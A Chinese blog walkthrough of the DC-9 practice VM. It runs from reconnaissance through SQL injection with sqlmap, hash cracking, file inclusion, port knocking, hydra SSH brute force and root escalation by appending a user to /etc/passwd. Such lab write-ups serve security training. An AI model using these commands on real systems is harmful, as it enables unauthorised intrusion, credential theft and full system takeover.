新手的第一次DC-9靶场渗透实战过程

新手的第一次DC-9靶场渗透实战过程

1.信息收集

nmap -sn 192.168.162.1/24 --exclude 192.168.162.128 192.168.162.1

image-20250825143219370

192.168.162.161的mac地址与靶机mac地址对比确定为靶机ip地址

现在对靶机ip进行进一步探测

nmap -sV -sC -O -p- 192.168.162.161

image-20250825143404222

开放了80端口,22端口关闭,先去看一下80端口是什么情况

image-20250825152714416

这个网站下面就有一些用户等信息,还有一个用户搜索这里使用Fred来进行测试看看有没有sql注入

image-20250825152659466

搜索用户完跳转到了results.php,并且给出来了这个用户的相关信息,我们这里使用插件hackbar进行测试

image-20250825152845847

当我们输入1'or'1='1恒成真,这里跳出来了其他的用户信息,这里存在sql注入

image-20250825153020438

2.渗透测试

把网站丢进sqlmap里面泡

python sqlmap.py -u http://192.168.162.161/results.php --level=5 --risk=3 --method=post --data=search=1 --dbs

image-20250825171720762

查询数据表

python sqlmap.py -u "http://192.168.162.161:80/results.php" --level=5 --risk=3  --method=POST --data=search=1 -D Staff --tables

image-20250825155933780

查询字段

python sqlmap.py -u "http://192.168.162.161:80/results.php" --level=5 --risk=3  --method=POST --data=search=1 -D Staff -T Users --column

image-20250825160021322

查询账户密码

python sqlmap.py -u "http://192.168.162.161:80/results.php" --level=5 --risk=3  --method=POST --data=search=1 -D Staff -T Users -C Password,Username --dump

这里使用时会跳出两个个选项

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]

当sqlmap通过--dump等参数导出数据时,若自动识别到某列包含密码哈希字符串(例如MD5、SHA1等加密格式),会询问用户是否将这些哈希值临时保存到本地文件

保存的临时文件(如/tmp/sqlmapYhWk861866/sqlmaphashes-b521h5.txt用于后续离线破解

  • 可通过John the RipperHashcat等工具进行暴力破解或字典攻击。
  • 避免重复扫描数据库,提升效率

输入 y(推荐场景)

  • 作用:将哈希值保存到临时文件,路径会在终端显示 。

  • 适用场景

    需用第三方工具(如Hashcat)深度破解密码 。

    批量处理多个目标时集中管理哈希 。

  • 后续操作

    sqlmap会立即追问是否进行字典破解(do you want to crack them via a dictionary-based attack?)[[1-8,12-15]]。

    若选择Y,sqlmap将调用内置字典(默认路径如/usr/share/sqlmap/txt/wordlist.zip)尝试破解

这里我们选择1使用sqlmap内置字典进行破解

image-20250825162128209

“do you want to use common password suffixes? (slow!) [y/N]”*是当您选择*破解密码哈希

  1. 作用原理

    • 对字典中的每个基础密码(如 password自动追加高频后缀(如 123!2023 等),生成变体密码进行爆破。
    • 例如:基础密码 admin → 扩展为 admin123admin!admin2024 等组合。
    • 核心目标:覆盖常见“弱密码模式”,提升破解成功率。

    输入 y(启用后缀)

    • 优势

      • 破解成功率显著提升(尤其对“基础密码+简单后缀”类弱密码)。
      • 典型场景:破解 password123hello!admin2024 等常见组合。
    • 代价

      • 速度急剧下降(计算量指数级增长):

    输入 N(默认选项,禁用后缀)

    • 优势

      • 保持原始字典速度,适合大规模哈希爆破。
      • 避免资源浪费(尤其当目标密码无后缀时)。
    • 风险

      • 可能遗漏 sunil123 这类“基础词+后缀”的密码

这里我们选择y

image-20250825162437178

得到账户密码

Username:admin
Password:transorbital1

我们去后台网站登录,就多了个Add Record页面,我们注意到底部这里网站底部出现 “File does not exist” 错误提示,本质上是服务器在响应请求时无法找到指定文件或资源时返回的路径引用错误

image-20250825162748331

我们这里使用yakit抓包一下,插入字典对目录进行爆破

image-20250825163811943

image-20250825163915443

image-20250825165009395

可以看到网站存在文件包含漏洞

image-20250825165051611

之前使用nmap发现22端口是被过滤状态可能是开启了knock服务也就是端口敲门,详情请看这个:https://zhuanlan.zhihu.com/p/59488488

knockd 服务的默认配置路径:/etc/knockd.conf我们文件包含一下这个路径

image-20250825165648132

3.内网渗透

可以看到,开启ssh端口得以此敲击 7469,8475, 9842我们这里使用nc进行敲击

nc -z 192.168.162.161 7469 8475 9842

image-20250825170227255

可以看到22端口开放状态从filter到open了

尝试使用admin账号登录ssh失败

在前面进行sqlmap测试的时候发现还有个user表我们看看

image-20250825171812799

用这些账号密码组成字典,爆破ssh

username.txt

marym
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2

password.txt

3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0

使用echo将内容写入文件里面 接下来用hydra进行爆破

image-20250825172036096

hydra -L username.txt -P password.txt ssh://192.168.162.161

image-20250825172617379

爆破出来三个用户

chandlerb:UrAG0D!
joeyt:Passw0rd
janitor:Ilovepeepee

依次进行登录后发现janitor能进行突破口,在这里进行ls -al操作后有个隐藏的文目录,这个文件名笑死我:给普京的秘密哈哈哈哈

image-20250825173505048

看看这个目录下面有什么

image-20250825173654343

有个密码再看看

image-20250825173714586

BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

也是拿到几个密码,追加到我们的密码本在进行爆破看看

image-20250825174008186

新爆破出来一个用户密码,登录看看

fredf:B4-Tru3-001

sudo -l一下看看有没有root权限运行的文件

image-20250825174200728

发现有个root权限文件

4. 提权

进行查看发现test 是一个python 文件

使用命令:find / -name test.py 2>/dev/null 查找python文件 进行查看

image-20250825174700713

这段Python脚本是一个文件内容复制工具,它的核心功能是将一个文件的内容读取出来,并追加到另一个文件的末尾,我们可以利用这个来进行去新添加一个root权限的用户,达到提权的效果

使用命令创建一个admin的账号

openssl passwd -1 -salt hacker 123456 

生成哈希值$1$hacker$6luIRwdGpBvXdP.GMwcZp/

image-20250825175218055

到tmp目录新建一个文件

cd /tmp
echo 'hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash' > hacker

image-20250825180615397

回到/opt/devstuff/dist/test目录,执行test程序,将hack的文件内容写入到/etc/passwd文件里面

cd /opt/devstuff/dist/test
 
sudo ./test /tmp/hacker /etc/passwd

cat /etc/passwd

image-20250825180959873

可以看到hacker用户已经添加到/etc/passwd文件里了,然后我们切换用户hacker输入密码即可拿到root权限

image-20250825181024401

image-20250825181048531

image-20250825181205040

posted @ 2025-08-26 13:42  0xMouise  阅读(14)  评论(0)    收藏  举报